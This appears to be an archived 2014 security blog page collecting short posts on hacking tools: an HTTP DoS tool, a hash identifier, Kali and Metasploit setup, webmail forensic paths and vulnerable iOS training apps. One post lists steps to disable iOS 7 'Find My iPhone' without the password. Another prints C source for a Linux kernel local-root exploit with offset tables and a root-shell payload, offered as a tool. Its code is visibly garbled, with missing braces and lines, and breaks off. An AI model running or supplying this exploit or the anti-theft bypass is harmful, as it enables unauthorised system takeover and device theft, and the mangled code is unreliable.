Feb 7, 2014

Tools: GoldenEye - HTTP DoS test tool

GoldenEye is an python app for SECURITY TESTING PURPOSES ONLY!
GoldenEye is a HTTP DoS Test Tool.
Attack Vector exploited: HTTP Keep Alive + NoCache

Source: https://github.com/jseidl/GoldenEye

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: HashTag – Password Hash Type Identification (Identify Hashes)

HashTag.py is a Python script written to parse and identify the password hash type used.
HashTag supports the identification of over 250 hash types along with matching them to over 110 hashcat modes (use the command line switch -hc to output the hashcat modes). It is also able to identify a single hash, parse a single file and identify the hashes within it, or traverse a root directory and all subdirectories for potential hash files and identify any hashes found.

One of the biggest aspects of this tool is the identification of password hashes. The main attributes used to distinguish between hash types are character set (hexadecimal, alphanumeric, etc.), hash length, hash format (e.g. 32 character hash followed by a colon and a salt), and any specific substrings (e.g. ‘$1$’). A lot of password hash strings can’t be identified as one specific hash type based on these attributes. For example, MD5 and NTLM hashes are both 32 character hexadecimal strings. In these cases the author made an exhaustive list of possible types and has the tool output reflect that.
It has three main arguments:
  • Identifying a single hash type (-sh)
  • Parsing and identifying multiple hashes from a file (-f)
  • Traversing subdirectories to locate files which contain hashes and parse/identify them (-d)

You can download HashTag here:

Source:  http://www.darknet.org.uk/2013/11/hashtag-password-hash-type-identification-identify-hashes/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Build a custom Kali KDE image

1 Install required packages with this command: 
apt-get install cdebootstrap kali-archive-keyring.

2. Clone the build environment with:  
git clone git://git.kali.org/live-build-config.git.

3. The build environment is in a directory called live-build-config. The next step is to change (cd) into that directory and start messing with it. So type this command:  
cd live-build-config.

4. Then run this command:  
lb build
The system will respond with an error message, and will output a command for you to run that will take care of the cause of the error. The command it will output is:  
ln -sf wheezy /usr/share/live/build/data/debian-cd/kali.

5. Modified your OS.

6. Run command:
lb config --architecture i386

7. Build the OS
lb build

Source: http://www.linuxbsdos.com/2013/03/29/how-to-live-build-a-custom-kali-linux-iso-for-kde-lxde-xfce-and-e17/  

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: iOS 7 Bug Allows Disabling of 'Find My iPhone' Without Password

1. Go to iCloud menu.

2. Go to your account(first menu)

3. Type wrong password.

4. Cancel it and back from your account

5. Go to your account again.

6.  Delete descrption of your account(Normally is iCloud)

7. Done

8. Check your Find my iphone settings, it's off

Source: http://www.macrumors.com/2014/02/06/disable-find-my-iphone/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Feb 5, 2014

Howto: Code examples for the new functions of iOS 7.

Code examples for the new functions of iOS 7.

Source: https://github.com/shu223/iOS7-Sampler?source=c

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Install Metasploit in Kali

1. Install package with apt-get
apt-get install build-essential libreadline-devlibssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git autoconf curl curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev ruby-dev

2. Clone Metasploit Source Code from github
git clone https://github.com/rapid7/metasploit-framework.git

3. Go to Metasploit folder
cd metasploit-framework

4. Install required lib of ruby
bundle install

5. Create database and user of metasploit in Postgresql
su - postgres
createuser msf -P -S -R -D
createdb -0 msf msf

6. Go to metasploit configuration folder
cd ~/.msf4

7. Create database configure of metasploit file
vim database.yml

    adapter: postgresql
    database: msf
    user: msf
    password: <from #5>
    port: 5432
    pool: 75
    timeout: 5

6. Try to go metasploit console

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Feb 4, 2014

Webmail Forensic Path In Browser

Internet Explorer

Since Internet Explorer (IE) is installed by default on most Windows installations, it’s likely the most commonly used and should always be searched when looking for webmail—or any browsing artifacts for that matter. Depending on the version of Windows and IE installed, the evidence will be stored in different locations. The locations are listed below:
  • WinXP – %root%/Documents and Settings/%userprofile%/Local Settings/Temporary Internet Files/Content.IE5
  • Win Vista/7 – %root%/Users/%userprofile%/AppData/Local/Microsoft/Windows/Temporary Internet Files/Content.IE5
  • Win Vista/7 – %root%/Users/%userprofile%/AppData/Local/Microsoft/Windows/Temporary Internet
  • Files/Low/Content.IE5
  • Win8/IE10 – %root%/Users/%userprofile%/AppData/Local/Microsoft/Windows/History
Note: Internet Explorer 10 is available on Windows 7 as well. If IE9 was installed and then upgraded to IE10, there will be two sources of evidence (the index.dat file from IE9 and the database within the webcache folder for IE10).

Mozilla Firefox

Firefox is a very popular browser and also stores its cache data in various locations based on the operating system installed. It’s installed as the default browser on many Linux distributions and is available for MacOS-X as well.
  • WinXP – %root%/Documents and Settings/%userprofile%/Local Settings/Application Data/Mozilla/Firefox/Profiles/*.default/Cache
  • Win7/8 – %root%/Users/%userprofile%/AppData/Local/Mozilla/Firefox/Profiles/*.default/Cache
  • Linux – /home/%userprofile%/.mozilla/firefox/$PROFILE.default/Cache
  • MacOS-X – /Users/%userprofile%/Library/Caches/Firefox/Profiles/$PROFILE.default/Cache/

Google Chrome

Google Chrome is also one of the top 3 browsers used today. It is available for Windows, Linux, and MacOS-X. Google also makes the Chromium open source project available to Linux users and runs very similar to the regular Chrome package with some minor differences i.
  • WinXP – %root%/Documents and Settings/%userprofile%/Local Settings/Application Data/Google/Chrome/User Data/Default/Cache
  • Win7/8 – %root%/Users/%userprofile%/AppData/Local/Google/Chrome/User Data/Default/Cache
  • Linux – /home/%userprofile%/.config/google-chrome/Default/Application Cache/Cache/
  • MacOS-X – /Users/%userprofile%/Caches/Google/Chrome/Default/Cache/
Source: http://articles.forensicfocus.com/2014/02/01/webmail-forensics-digging-deeper-into-browsers-and-mobile-applications/

 you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Videos: AppSec California 2014


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Feb 3, 2014

Tools: Linux kernel 3.4+ local root (CONFIG_X86_X32=y)

#define _GNU_SOURCE
#include <netinet/ip.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/utsname.h>
#define __X32_SYSCALL_BIT 0x40000000
#undef __NR_recvmmsg
#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
#define VLEN 1
#define BUFSIZE 200
int port;
struct offset {
    char *kernel_version;
    unsigned long dest; // net_sysctl_root + 96
    unsigned long original_value; // net_ctl_permissions
    unsigned long prepare_kernel_cred;
    unsigned long commit_creds;
struct offset offsets[] = {
    {"3.11.0-15-generic",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10
    {"3.11.0-12-generic",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10
    {"3.8.0-19-generic",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04
void udp(int b) {
    int sockfd;
    struct sockaddr_in servaddr,cliaddr;
    int s = 0xff+1;
    if(fork() == 0) {
        while(s > 0) {
            fprintf(stderr,"\rbyte %d / 3.. ~%d secs left    \b\b\b\b",b+1,3*0xff - b*0xff - (0xff+1-s));
        sockfd = socket(AF_INET,SOCK_DGRAM,0);
        servaddr.sin_family = AF_INET;
        sendto(sockfd,"1",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr));
void trigger() {
    if(getuid() != 0) {
        fprintf(stderr,"not root, ya blew it!\n");
    fprintf(stderr,"w00p w00p!\n");
    system("/bin/sh -i");
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
// thx bliss
static int __attribute__((regparm(3)))
getroot(void *head, void * table)
    return -1;
void __attribute__((regparm(3)))
    asm("mov $getroot, %rax; call *%rax;");
int main(void)
    int sockfd, retval, i;
    struct sockaddr_in sa;
    struct mmsghdr msgs[VLEN];
    struct iovec iovecs[VLEN];
    char buf[BUFSIZE];
    long mmapped;
    struct utsname u;
    struct offset *off = NULL;
    for(i=0;offsets[i].kernel_version != NULL;i++) {
        if(!strcmp(offsets[i].kernel_version,u.release)) {
            off = &offsets[i];
    if(!off) {
        fprintf(stderr,"no offsets for this kernel version..\n");
    mmapped = (off->original_value  & ~(sysconf(_SC_PAGE_SIZE) - 1));
    mmapped &= 0x000000ffffffffff;
    port = (rand() % 30000)+1500;
    commit_creds = (_commit_creds)off->commit_creds;
    prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred;
    mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
    if(mmapped == -1) {
    memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3);
    memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300);
    if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) {
    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sockfd == -1) {
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sa.sin_port = htons(port);
    if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
    memset(msgs, 0, sizeof(msgs));
    iovecs[0].iov_base = &buf;
    iovecs[0].iov_len = BUFSIZE;
    msgs[0].msg_hdr.msg_iov = &iovecs[0];
    msgs[0].msg_hdr.msg_iovlen = 1;
    for(i=0;i < 3 ;i++) {
        retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i);
        if(!retval) {
            fprintf(stderr,"\nrecvmmsg() failed\n");

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: iOS Vulnerability LAB

Damn Vulnerability iOS Application 

Damn Vulnerable IOS Application was born from the need to have a tool where a user can test their IOS penetration testing skills in a safe and legal environment. Also, this application can be used by mobile security enthusiasts and students to learn or review the basics of mobile application security.



The OWASP iGoat project is a security learning tool for iOS developers to learn about security weaknesses in iOS -- by breaking things as well as fixing them.
iGoat is available ONLY in source code format, and this is the official repository for that code.
On the Downloads tab here, you will find the full iGoat source tree in tar format, or you can go to the Source tab for instructions on using Mercurial to grab (or clone) the source tree.
Be sure to also check out the Wiki tab here for useful documents related to the iGoat project. 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.